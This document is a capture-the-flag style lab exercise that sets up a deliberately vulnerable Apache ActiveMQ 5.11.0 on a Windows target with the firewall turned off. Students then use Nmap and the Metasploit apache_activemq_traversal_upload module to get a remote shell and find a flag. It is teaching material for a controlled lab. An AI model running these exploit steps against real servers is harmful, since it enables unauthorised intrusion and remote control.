H 310: Metasploit v. ActiveMQ (20 pts)

What you need

A Debian server on the Google Cloud,
A Windows target machine on the same network, either in the Google Cloud or a local VM connected to the Debian server with a VPN

Purpose

To practice using Metasploit to exploit a vulnerable Windows application.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.

Type FIREWALL.

In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing Java

On your Windows system, in Firefox, go to

https://java.com

Click the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".

Installing Apache ActiveMQ v5.11.0

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your Windows system, in Firefox, go to:

https://activemq.apache.org/activemq-5011000-release

Download the apache-activemq-5.11.0-bin.zip file, as shown below.

You will need to allow the download with a potential security risk in Firefox.

Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All..", Extract.

An "apache-activemq-5.11.0-bin" window opens. In the address bar of Windows Explorer, type CMD and press Enter. This opens a Command Prompt in that folder.

Starting ActiveMQ

In the Command Prompt window, execute these commands:

cd apache-activemq-5.11.0 bin\activemq.bat start

ActiveMQ starts, showing "ActiveMQ WebConsole available at http://0.0.0.0:8161/" as shown below.

Task 2: Preparing the Debian Server

Installing Metasploit

In an SSH session to your Debian server, execute these commands:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall

Metasploit installs, as shown below.

Installing Nmap

Execute this command:

sudo apt install nmap

Enter y to install the package.

Nmap installs, as shown below.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.

sudo nmap -sV -p8161 192.168.100.2

You should see the port open, as shown below.

Task 3: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Debian server, execute this command:

msfconsole -q

It asks if you want to setup a database. Reply no.

At the msf5 > prompt, execute this command:

search activemq

A list of exploits appears, as shown below.

Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.

Selecting Options and Target

At the msf5 > prompt, execute these commands:

use exploit/windows/http/apache_activemq_traversal_upload show options

The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below,

At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:

set RHOSTS 192.168.100.3 set LHOST 192.168.100.1 exploit

You get a shell, as shown below. Press Enter to see a Windows prompt.

H 310.1: Java Module (20 pts)
In the shell, execute this command:
tasklist /m java*
Find the Module name, which is covered by a green box in the image below. That's the flag.

Posted 5-21-2020
Flag number fixed 8-4-20
Download link and CMD opening process updated 7-19-23